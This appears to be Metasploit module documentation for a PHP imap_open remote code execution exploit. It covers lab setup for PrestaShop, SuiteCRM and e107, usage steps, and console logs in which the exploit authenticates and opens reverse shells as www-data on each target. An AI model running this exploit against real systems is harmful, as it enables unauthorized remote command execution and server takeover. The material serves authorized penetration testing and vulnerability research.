h00die
12 KiB
12 KiB
Vulnerable Application
The imap_open function within php,
if called without the /norsh flag, will attempt to preauthenticate an IMAP session.
On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's
ProxyCommand option can be passed from imap_open to execute arbitrary commands.
While many custom applications may use imap_open, it is reported that the following
applications are vulnerable:
-
instantcms
-
SugarCRM
Prestashop exploitation requires the admin URI, and administrator credentials.
SuiteCRM exploitation requires administrator credentials.
e107 v2 exploitation requires administrator credentials.
Prestashop 1.7.2.4 on Ubuntu 16.04
Mostly derived from websiteforstudents.com, with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
Run the following database commands:
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
Utilize the following configuration:
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/prestashop/
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/prestashop/>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
Browse to the website, and install with default information.
sudo rm -rf /var/www/html/prestashop/install/
Now browse to /admin, and the first time you'll be redirected to the admin URI. If not, sudo ls /var/www/html/prestashop/admin*.
SuiteCRM 7.8.23 on Ubuntu 16.04
Mostly derived from vultr.com but adding php's zip and mbstring packages.
sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf
Utilize the following configuration:
<VirtualHost *:80>
ServerAdmin admin@yourdomain.com
DocumentRoot /var/www/html/suitecrm/
ServerName yourdomain.com
ServerAlias www.yourdomain.com
<Directory /var/www/html/suitecrm/>
Options FollowSymLinks
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/suitecrm-error_log
CustomLog /var/log/apache2/suitecrm-access_log common
</VirtualHost>
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql
e107 2.1.9 on Ubuntu 16.04
Mostly derived from websiteforstudents.com, however with php 7.0 instead of 7.2.
sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p
Run the following database commands:
CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf
Utilize the following configuration:
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/e107
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/e107/>
Options FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory /var/www/html/e107/>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*) index.php [PT,L]
</Directory>
</VirtualHost>
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.server
sudo systemctl restart mysql.service
Verification Steps
- Install a vulnerable application
- Start msfconsole
- Do:
use exploit/linux/http/php_imap_open_rce - Do:
set TARGETURI [URI] - Do:
set USERNAME [username] - Do:
set PASSWORD [password] - Do:
set target [target] - Do:
run - You should get a shell.
Options
TARGETURI
The URI for the target. This may change by target. Default is .
Prestashop should be the admin URI, similar to /admin2769gx8k3.
Scenarios
PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0
resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (presta.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (presta.rb)> set target 0
target => 0
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Redirected to http://1.1.1.1/admin2769gx8k3/
[*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] IMAP server change left on server, manual revert required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500
uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0
resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
resource (suitecrm.rb)> set target 1
target => 1
resource (suitecrm.rb)> set TARGETURI /
TARGETURI => /
resource (suitecrm.rb)> set USERNAME admin
USERNAME => admin
resource (suitecrm.rb)> set PASSWORD admin
PASSWORD => admin
resource (suitecrm.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (suitecrm.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (suitecrm.rb)> set verbose true
verbose => true
resource (suitecrm.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Loading login page
[*] Logging in as admin:admin
[+] Login Success
[*] Loading InboundEmail page
[+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0
resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
resource (e107.rb)> set target 2
target => 2
resource (e107.rb)> set TARGETURI /
TARGETURI => /
resource (e107.rb)> set USERNAME admin
USERNAME => admin
resource (e107.rb)> set PASSWORD admin
PASSWORD => admin
resource (e107.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (e107.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (e107.rb)> set verbose true
verbose => true
resource (e107.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Logging in as admin:admin
[+] Login Success
[*] Checking if Cron is enabled for triggering
[+] Storing payload in mail settings
[*] Loading cron page to execute job manually
[+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)